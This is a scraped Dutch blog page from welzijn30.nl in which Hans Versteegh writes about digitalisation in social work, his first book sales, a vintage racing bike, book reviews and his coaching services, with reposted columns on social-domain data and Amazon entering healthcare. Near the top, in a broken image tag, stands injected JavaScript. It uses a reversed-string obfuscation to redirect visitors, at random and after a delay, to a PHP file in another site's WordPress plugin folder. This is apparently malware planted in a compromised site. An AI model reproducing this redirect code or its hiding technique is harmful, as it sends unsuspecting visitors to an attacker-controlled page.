Blog: Het sociaal zwakste belang staat bij digitalisering op achterstand (Zorg+Welzijn)

In het sociaal domein worden digitaal cliënt-gegevens in online dossiers vastgelegd. Het gaat om gegevens van de meest kwetsbaren in de samenleving, met het sociaal zwakste belang. Er is echter een schrijnend verschil te zien in vergelijking met medische gegevensverwerking. Met sociaal gezien onwenselijke gevolgen.

Lees hieronder welke actie van sociaal werkers en hun organisaties nu nodig is, in mijn blog op Zorg en Welzijn:

and/

$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and (Zorg+Welzijn)” width=”960″ height=”405″ />

Lees ook mijn boek, Digivaardig sociaal werk, hier te bestellen: https://www.welzijn30.nl/digivaardig-sociaal-werk/

 

Het bizarre gevolg van een rondje fietsen

bizarre gevolgenVorige week liet ik je weten dat ik sinds jaren weer eens een rondje had gefietst op de racefiets. De gevolgen waren bizar. Niet omdat het de onwennige eerste keer was op deze vintage fiets. Niet omdat de ketting er natuurlijk af liep en ik een mooie zakdoek verpeste met kettingsmeer (zie de foto).

Nee, er gebeurde iets heel gaafs.

Mijn bericht van vorige week had de titel “Drie boeken en één fiets.” Het bevatte inderdaad drie boeken-tips (onderaan vind je de link nogmaals) en het verhaal over hoe het komt dat ik nou toch weer op die fiets zat. Dezelfde als die ik in mijn jeugd heb gehad, en nu weer terugvond. Gewoon, een leuk mailtje, dacht ik. Misschien wel interessant voor je. En anders toch gewoon lollig, hoopte ik. Maar dat was zwaar onderschat.

Het ontplofte .

Even wat cijfers. Die mail werd op de eerste dag 293 keer geopend (24,4%) en 56 mensen klikte op een link naar mijn site. Op dag 2 stuurde ik de mail naar mensen die hem op dag 1 niet openden. Nog eens 109 ontvangers deden dat nu wel (11,9%), en 18 klikte door naar de site.

Mijn website is normaal een rustig kabbelende site met een bezoekersaantal waar je echt niet van achterover slaat. Die trok nu op de eerste dag 69 bezoekers, op dag 2: 30 bezoekers en dag 3: 18 bezoekers. Dik 117 bezoekers als gevolg van dat ene mailtje.

Op social media was het een nog groter gekkenhuis. Daar plaatse ik meermalen de link naar mijn website, waar je het hele verhaal kan lezen. Op Linkedin, Twitter en Instagram samen tel ik 1184 weergaven van het bericht over die drie boeken en een fiets.

Indrukwekkend.

Wat een aandacht. De kracht van online communicatie. Was het de titel, die enigszins mysterieus was? Een gekke combinatie, drie boeken een een fiets. Maar daardoor gebeurde iets bizars dat ik helemaal nog niet zag aankomen. Ik was er nog niet op voorbereid.

Ik verkocht mijn aller aller eerste boek! Ooit!

En een dag later nog één!

Echt G-E-W-E-L-D-I-G!

In de zevende hemel. Het boek verschijnt pas in het najaar maar er zijn er nu al twee verkocht. Ongelofelijk. Mijn vriendin kreeg tegelijkertijd een baan aangeboden, dus kennelijk was het onze geluksdag. Natuurlijk zette ik trots een triomf-berichtje op Linkedin. Ik kon het wel van de daken schreeuwen! Ik stikte natuurlijk ook van nieuwsgierigheid: WIE WAS DIE EERSTE KOPER? Dus dat vroeg ik. Ik ben daarna  overstelpt met reacties. Allemaal lieve, die me een bestseller gunnen! Wauw! Love you all! Het berichtje was goed voor 46 likes, 23 reacties (supertof, dank!) en dat ene Linkedin bericht is wel 3397 keer gezien.

Het eerste exemplaar van Digivaardig sociaal werk is verkocht

Het eerste exemplaar is al gekocht!

Maar die eerste lezer, die melde zich niet. 🙁

De tweede had ik al wel snel in de gaten. Iemand die mij al jaren kent en zoals ze zelf zegt, mij vertrouwt. Wat een mooi compliment! Alsof ik al niet naast mijn schoenen liep. Ik ben heel dankbaar voor zulke mooie woorden.

Maar … ben jij toevallig diegene die mijn eerste boek heeft gekocht?

Dat zou best kunnen, want misschien krijg je al jaren mijn mails en heb ik je ook wel eens in een workshop gezien. Geen idee, maar ik zou het leuk vinden te weten wie je bent. Want ik wil als dank iets voor je terug doen. Wat? Daar komen we wel uit.

Groeten,

Hans Versteegh

p.s. 1. Wil je het bericht van vorige week terug lezen, inclusief de drie boekentips? Dit is de link: https://www.welzijn30.nl/drie-boeken-en-een-fiets/

p.s. 2. Ik heb ook iets nieuws: de 1 uur coach! Persoonlijk, vertrouwd, betaalbaar en gemakkelijk. Social media advies en hulp bij jou op je werkplek. Want dáár moet het gebeuren, toch? Dus kom ik naar je toe. Ideaal! Kijk eens op https://www.welzijn30.nl/1-uur-coach/

Het boek, “Digivaardig sociaal werk, handboek voor de digitale transitie” komt in het najaar van 2019 uit. En het mooie is … jij kan het nu al vast reserveren

via deze link

#digivaardigsociaalwerk

#socialwork #innovatie #digivaardig #welzijn

Digivaardig sociaal werk omslag

Drie boeken en één fiets

Na inlevering van het manuscript van “Digitaal Sociaal Werk” bij de uitgever deed ik twee dingen. De dag er na sprong ik eindelijk weer eens op de racefiets. Daarover straks meer. En ik kon weer eens boeken van anderen lezen. Het werden de drie boeken hieronder. Die samen mooi mijn brede blik op digitale innovatie weerspiegelen.   

Het liefst lees ik iets waar ik wat van op steek. Geen romans of dikke pillen die iedereen schijnt te verslinden. Niks voor mij. Toegepast lezen, da’s OK. Ik las er de afgelopen tijd zelfs drie door elkaar. En het grappige is, twee ervan hebben “3.0” in de titel. Dat is voor mij natuurlijk magisch! Hier volgen mijn korte  recensies.

Boekenlijst Welzijn 3.0

Drie boeken die ik afgelopen maanden las.

CIO 3.0

Dit boek is geschreven vanuit de blik van de ICT-er, op de digitale transitie. Door twee consultants die vooral gemeenten bedienen: Karin Zwiggelaar en Antoon van Luxemburg. Ja, ik hoor het al; “saai!” Klopt, tot je het zo gaat lezen dat je ICT vervangt door mensen, door teams, door sociaal werkers. En dan gaat het ineens over veranderen, innoveren, implementeren. Met digitalisering als hoofdonderwerp. En is het geen techneuten-boek maar menselijk en heel actueel. Een CIO is een Chief Information Officer, die de stevige taak heeft de organisatie vanuit de  bestuurderslaag om te vormen om ook in de digitale tijd waardevol te kunnen zijn voor klanten. En dat is nu natuurlijk een CIO 3.0.

Denk jij ook dat het niet saai is en heb je interesse? Je kan dit boek hier bestellen.

Sociaal werk in de digitale samenleving

Hier ben ik het meest enthousiast over! Omdat het gaat over waar ik me ook mee bezig hou, zoals je weet. Het kwam uit in de week voordat de deadline van mijn boek verstreek. Hopelijk lukt het met deze twee boeken het onderwerp digitalisering in het sociaal werk op de kaart te  zetten. Dus ik beveel het je van harte aan. Een keigoed boek dat heel helder uiteen zet waarom (aankomend) sociaal werkers zich moeten verdiepen in digitalisering. Marcha Hartman heeft zelfs een methode bedacht die stap voor stap uitgelegd wordt, op micro, macro en meso niveau. Interessant zijn de stukken die ingaan op jouw eigen rol als professional in het sociaal domein bij verschillende vormen van digitalisering. Het is vooral voor studenten bedoelt, maar dat hoeft professionals niet te weerhouden. Ook als je al een tijdje werkt, kan het boek je helpen. Sterker, het is bij vlagen een ambitieus boek dat de lat soms hoog legt. Ik hou er wel van. Mijn tip; kijk goed wat je zelf kan doen, wanneer dit allemaal nieuw voor je is.

Interesse? Ik hoop het! Je kan dit boek hier bestellen. (Al dan niet tegelijk met een reservering voor mijn boek …, zie hieronder, TIP)

Calimeromarketing 3.0

Weer een 3.0 boek! Jazeker. En ook rondom digitalisering. Karen Romme leert je hoe jij zelf als een vuurtoren je licht laat schijnen op je klantengroep en hoe je potentiele klanten als vanzelf naar je toe trekt. Natuurlijk vooral door gebruik te maken van alle digitale middelen van nu. Plus een flink aantal handige marketing tips daarbovenop. Het is geschreven voor zzp-ers. Maar ik denk dat het zeker ook bruikbaar in sociaal werk organisaties waar professionals ook geacht worden als ambassadeur zichzelf en de organisatie te profileren / zichtbaar te zijn. Kortom, een vuurtoren te zijn. Het leest als een trein, is leuk en nodigt uit om direct aan de slag te gaan of aantekeningen te maken. Er is ook een kleinere samenvatting van die minder leestijd vergt.

Hiep hiep hoi! Heb je interesse? Je kan dit boek hier bestellen.

Dan, die racefiets.

Wielrennen is mij al als kleine jongen is bijgebracht. Als cadeau voor een van de middelbare school examens kreeg ik een zilvergrijze Peugeot met oranje letters, die eigenlijk net iets te klein voor me was. Die fiets is ergens uit mijn leven verdwenen. Ik weet niet eens meer hoe. Als student heb ik een andere gekocht, die wel groot genoeg was. Die ruilde ik later weer in voor een paar MTB’s om bij Zeist in het bos te raggen. Ook leuk, maar wel gedoe. Vies worden en zo. En ik hou niet van sporten met gedoe.

Dus toen was er een tijdje niks.

Tot ik op Marktplaats ging kijken en toevallig tegen een zilvergrijze Peugeot met oranje letters aanbotste. Precies zo een als mijn eerste! Deze had ook nog bijpassend fel-oranje stuurlint!  Aangezien ik dit jaar de 50 aantik en geen Harley blief, maar toch iets moet met die midlife crisis, besloot ik deze te kopen. Alleen …

Het was december.

Te koud en te nat. Dus gedoe. Bovendien, ik had een deadline. Mijn manuscript moest af. Ik poetste het ding wat op om de fiets goed te leren kennen en lekker te laten glimmen, en liet het daar bij. Tijdens het schrijven van mijn boek stond de fiets achter mij, in mijn kantoor. Iedere dag aaide ik hem (echt) en liet ik de trappers 1 klikje van de derailleur maken.

Eentje maar.

Net zo lang tot het manuscript klaar was. Op zondagavond 31 maart mailde ik het naar de uitgever. Gelukt! De dag er na, op 1 april, de dag van de deadline, was het prachtig weer. En ik had ineens tijd over. Daar stond die fiets. Het perfecte middel om mijn hernieuwde vrijheid mee te vieren. Ik maakte een mooie tocht over de Utrechtse Heuvelrug en trakteerde me op een lunch (twee kroketten op brood en een glas melk) op een terras in het bos bij Lage Vuursche. Vlak naast het paleis van prinses Beatrix.

Iets met het oranje stuurlint, denk ik.

Lekker hoor, even de racefiets kunnen pakken. Dat idee alleen al is zo fijn. Zo’n mooi klassiekertje uit de jaren ’70. Loeizwaar en zwaar krakend. Aan dat laatste moet ik toch eens wat laten doen. Maar o zo leuk. Van fietsen krijg je zo’n lekker leeg hoofd. Helemaal hier in de buurt, ’t is hier prachtig. Een buurman twee huizen verderop bleek ineens deze winter dezelfde zwakte ontwikkelt te hebben, maar hij wordt 42, is fanatieker en gaat sneller. Op veel nieuwere fietsen. Hij wil samen gaan fietsen, op een doordeweekse avond of zo.

Niet over nadenken.
Hier zie je mij en mijn Franse maatje op het Leersumse Veld, met 32 graden, vandaar het zweet. Dus niet dat ik daar nu zo hard ging hoor. Ik rij in een ouwe-lullen-tempo op een ouwe-lullen-fiets. Ik ga beiden niet afbeulen, het moet wel leuk blijven. Geen helm nodig, gedoe.

Er is dus ook tijd om weer eens een boek lezen! Dat gun ik jou ook. Want ….

Mijn boek, “Digivaardig sociaal werk, handboek voor de digitale transitie” komt in het najaar van 2019 uit. En het mooie is … jij kan het nu al vast reserveren

via deze link

#digivaardigsociaalwerk

#socialwork #innovatie #digivaardig #welzijn

Digivaardig sociaal werk omslag

De omslag van Digivaardig sociaal werk, handboek voor de digitale transitie

Diensten

Hieronder zie je een opsomming waarvoor je allemaal bij mij terecht kunt:

#digivaardigsociaalwerk #sociaalwerk #socialwork #welzijn #welzijnswerk #sociaal #sociaaldomein #transitie #jongerenwerk #wijkwerk #opbouwwerk #buurtwerk #zorg #ehealth #socialetechnologie #profileren #zichtbaar #socialmedia #digitaal #welzijn30 #workshop #workshops #training #trainingen #socialmedia #socialemedia #technologie #hulp #lezing #lezingen #presentatie #presentaties #boek #boeken #blog #blogs #begeleiding #werkers #werker #professionals #professional #participatie #eropaf #dichtbij #present #uitvoering #meedoen #digivaardig #digitaal #online #inspiratie #voorbeelden #voorbeeld #website #websites #hierstaikvoor #marketing #reclame #verkopen #innoveren #innovatie #implementeren #inplementatie #strategie #beleid #beleidsplan #gevondenworden

Dus … www.welzijn30.nl ?

0644062029

Hans Versteegh

Het digitaal innovatie team

In deze prachtige omgeving mocht ik vandaag een kersvers #digitaal #innovatie #team in de #jeugdzorg op het juiste spoor zetten, tijdens hun allereerste bijeenkomst. Soms is het jammer dat ik er bij het vervolg niet bij ben, tenminste, dat was nog niet de opzet. De energie werkte in ieder geval aanstekelijk. Die komen er wel. ???

#digivaardigsociaalwerk #sociaalwerk #socialwork #welzijn #welzijnswerk #sociaal #sociaaldomein #transitie #jongerenwerk #wijkwerk #opbouwwerk #buurtwerk #zorg #ehealth #socialetechnologie #online #profileren #zichtbaar #socialmedia #digitaal #innovatie #welzijn30

www.welzijn30.nl ?

Help even

Nieuwe plannen, maar help je even?

Ik speel met het idee workshops rondom #digitaal #sociaalwerk / #profileren met open inschrijving te gaan geven. Aan kleine groepjes sociale professionals, in mijn mooie groene tuinkantoor in Zeist. Ik krijg daar wel eens vragen over, maar ik zoek nog naar de goede insteek.

Waarover zou jij bij mij een workshop van een dagdeel of een dag willen volgen? Waar loop jij tegenaan als het gaat om digitaal (sociaal-) werk? Wat moet het resultaat zijn van die workshop? Wil je dan alleen komen of met een collega? En wat zou je er voor willen betalen? 

Meld je ideeën per email naar:


mailto:info@welzijn30.nl

Dankjewel! ?

#digivaardigsociaalwerk #digivaardig #socialwork #welzijn #welzijnswerk #sociaal #sociaaldomein #transitie #jongerenwerk #wijkwerk #opbouwwerk #buurtwerk #zorg #ehealth #socialetechnologie #online #profileren #innoveren #zichtbaar #socialmedia  #welzijn30

www.welzijn30.nl ?

Social media strategie

Een #socialmedia #strategie schrijven, voor en met een klant (een grote landelijke maatschappelijke organisatie). Na een sessie om hier input voor te krijgen en vóór een andere sessie, met andere betrokkenen van deze club, om de strategie te toetsen en praktisch te maken. Daarna gaan we iedereen ook nog trainen! Wil jij dit ook? Geef me dan een berichtje. 

#digivaardigsociaalwerk #sociaalwerk #socialwork #welzijn #welzijnswerk #sociaal #sociaaldomein #transitie #jongerenwerk #wijkwerk #opbouwwerk #buurtwerk #zorg #ehealth #socialetechnologie #online #profileren #zichtbaar #socialmedia #digitaal #welzijn30

www.welzijn30.nl ?

Negen urgente redenen om in 2019 van digitalisering een speerpunt te maken (blog Zorg en Welzijn december 2018 of januari 2019)

Negen urgente redenen waarom in 2019 een professionele visie op digitalisering van sociaal werkers en hun organisaties gevraagd wordt.

  1. De context is digitaal geworden

Digitalisering is de meest recente grote stap in de ontwikkeling van de mensheid. Digitale technologie is overal en altijd om ons heen. Het maakt ons leven makkelijker. Maar ook ingewikkelder. Als werker sta je midden in de maatschappij en krijg je met beide te maken.

  1. Blijven aansluiten als beroepsgroep

De achilleshiel van de sociale sector. Werkers zijn vaak mensen-mensen. Techniek heeft niet de grootste interesse. Maar maatschappij en (werk-)prosessen doen een steeds groter beroep op digitale vaardigheden. Niet kunnen meedoen is jezelf buitenspel zetten. Je wil toch relevant blijven voor je werkgever en de samenleving?

  1. Duurzaam inzetbaar zijn als professional

Competenties als zichtbaar zijn, ondernemend werken, netwerken, signaleren, activeren en innoveren bieden ruimte voor een online invulling. Social media moet iedereen kunnen toepassen en basale computervaardigheden zijn al langer een must. Bijscholing is essentieel om duurzaam inzetbaar te zijn in het sociaal domein.

 4.  Doelgroepen ondersteunen bij hun participatie

Wie zelfredzaam wil participeren zal op internet zijn zaakjes moeten kunnen regelen. Professionals moeten in staat zijn daarbij te ondersteunen, of voorzieningen op te zetten waar doelgroepen die ondersteuning kunnen krijgen. Waar nodig 24/7.

  1. Mee-oplossen van maatschappelijke problemen

Eenzaamheid, gezondheid en cohesie. Sociale media zorgen voor menselijk contact zonder fysieke nabijheid. Via apps en gamification-elementen worden mensen aangespoord te bewegen en hun gezondheid te monitoren. Buren kunnen per app-groep iets voor elkaar betekenen. Kansen die werkers kunnen initiëren en uitbouwen.

  1. Zorg komt digitaal de wijk in

Zorg wordt steeds meer thuis, in de wijk geleverd m.b.v. digitale diensten als beeldbellen, apps en digitale meetapparatuur. Minder ziekenhuisbezoek verlicht de druk op het dagelijks leven van patiënten. Wijkgerichte professionals krijgen hierdoor met complexere “situaties achter de voordeur” te maken.

  1. Innovatie van dienstverlening

Bestaande dienstverlening kan vaak een online variant krijgen. Van werkers vraagt dit wel een extra set digitale vaardigheden omdat vaak doorgevraagd moet worden hoe iemand erbij zit en hoe de boodschap ontvangen wordt. Maar dat is te trainen.  Digitalisering schept ook mogelijkheden voor nieuwe diensten in het sociaal domein (die als we niet oppassen zeker door externen zullen worden opgepakt).

  1. De digitale kloof

Nederland telt 3,5 miljoen laaggeletterden en digibeten voor wie het sturen van e-mail al ingewikkeld is. ‘Onze informatiesamenleving lijkt hen te vergeten, er ontstaat een digitale kloof’, waarschuwde het Sociaal en Cultureel Planbureau. Het sociaalwerk heeft de verantwoordelijkheid deze mensen te ondersteunen. Hoe voorkomen we dat mensen het niet meer bij kunnen benen en de maatschappij de rug toe keren?

  1. Andere digitaal gerelateerde zorgvragen

Internetverslaving, gameverslaving, psychische druk (fear of missing out), sexting, cyberpesten, enz. Bijwerkingen die ontwrichtend kunnen zijn in levens. Als sociaal werker heb je hier minimaal een signalerende functie. Weet waar je dan hulp kunt krijgen.

Er is geen argument meer waarom er geen aandacht voor digitalisering in het sociaal domein zou zijn. Integendeel. Sociale professionals in Nederland kunnen een belangrijke rol spelen en nieuwe kansen benutten.

Wat ga jij in 2019 oppakken?

Hans Versteegh

Welzijn 3.0

www.welzijn30.nl

Wil je weten hoe je getraind kan worden? https://www.welzijn30.nl/social-media-workshop-in-zorg-en-welzijn/ 

Amazon is op oorlogspad met ons (Blog Zorg en Welzijn november 2018)

Het VPRO-programma Tegenlicht maakte onlangs nog eens helder dat data en artificial intelligence (AI) het voor tech-bedrijven als Amazon mogelijk maken dienstverlening uit te breiden naar de gezondheidszorg. Het bedrijf is in staat gezondheid en het gebruik van zorg voorspellen. En ontwikkelt nu eigen gezondheidsdiensten die ook in Europa / Nederland geleverd gaan worden. De vraag is hoe dit uit gaat pakken. Amazon kan je hier trouwens net zo makkelijk kan vervangen door Apple, Microsoft of Google.

Hoe werkt het?

Binnen Amazon stelt men zich de vraag: “hoe kunnen we ons bedrijf het best om zeep helpen.” Daar komen een paar verontrustende ideeën uit die zo reëel mogelijk worden uitgewerkt. En vervolgens gaan ze juist dát doen, om de concurrent voor te blijven. Want, als zij het kunnen bedenken, dan kan de concurrent het ook. En die zal het ook gaan doen, als je te lang wacht. (Misschien is het een idee om deze exercitie ook eens in je eigen organisatie te doen?)

Amazon neemt de markt over door zich te verbinden aan een aantal grote spelers. Die in feite hun concurrenten zijn. Denk aan grote zorgaanbieders, verzekeraars, grote kennisinstituten en ook aan de overheid. Die zien natuurlijk wel wat in zo’n machtige innoverende partner en zetten de deuren open.

Amazon zal de hele keten van zorg verlenen zo gaan organiseren dat het sneller, beter en goedkoper kan, gebaseerd op informatie (data) uit cloud- en web-services. ICT / technologie, als basis van vernieuwing en leidend van begin tot eind. Van reclame tot opslag, verzenden, transporteren, aanbieden tot klanttevredenheid. Wat ze aanbieden is daarbij gratis of net onder de kostprijs.

Binnen “samenwerkingsverbanden” haalt Amazon de krenten uit de pap en laat de rest (verliesgevende diensten die niet te digitaliseren zijn) doodbloeden. Daar waar gevestigde organisaties binnen het stelsel moeten handelen, zal Amazon als een soort Uber zich er onder vandaan kunnen wringen. Zonder last van verantwoordelijkheidsgevoel of maatschappelijke waarden. Waarna afscheid genomen wordt van de partner / concurrent en consumenten meer gaan betalen vanwege de bereikte monopolie positie. Bestuurders, organisaties en medewerkers in verwarring en wanhoop achterlatend.

Dat noemen we disruptie.

Of loopt het zo’n vaart niet?

Biedt de structuur zoals wij die in het zorgstelsel kennen waarborgen voor continuïteit op langere termijn? Of gaat dat juist een blok aan het been zijn voor innovatie? De gemiddelde levensduur van organisaties is al gedaald van 65 naar 10 jaar. Gaan we er last van hebben wanneer organisaties het gevaar weldegelijk zien, maar gebonden zijn aan de kaders van ons stelsel?

Daarbij komt nog dat onze sector soms aards-conservatief lijkt. De digitale transformatie van zorg en het sociaal domein gaat stroperig. Ok, er is aandacht voor elektronische patiëntendossiers, robots logeren bij cliënten om van te leren en patiënten leren beeldbellen en chatten met zorgaanbieders (of andersom). Maar er zijn nog weinig organisaties die grootschalig diensten verlenen die louter gebaseerd zijn op ICT en data. En die zijn vooralsnog alleen zorg gerelateerd.

Wie gaat het tij keren?

Hebben we in de zorg en het sociaal domein visionaire bestuurders, managers en toezichthouders die het benodigde kennisniveau rond digitalisering bezitten? Die in staat zijn ICT als essentiële basis te doorgronden en te erkennen voor innovatie? Die snappen dat dit de enige weg is om te kunnen overleven? Die het lef hebben om kaders en structuren daarvoor los te laten?

Bestuurders en de digitalisering van hun organisaties; ze moeten iets met elkaar. Komt het goed? Ik ben er niet helemaal gerust op. Maar we gaan het de komende jaren zien.

Verschenen op https://www.zorgwelzijn.nl/blog/29847-2/

Lees ook: https://www.welzijn30.nl/waarom-2025-digivaardig-sociaal-werk/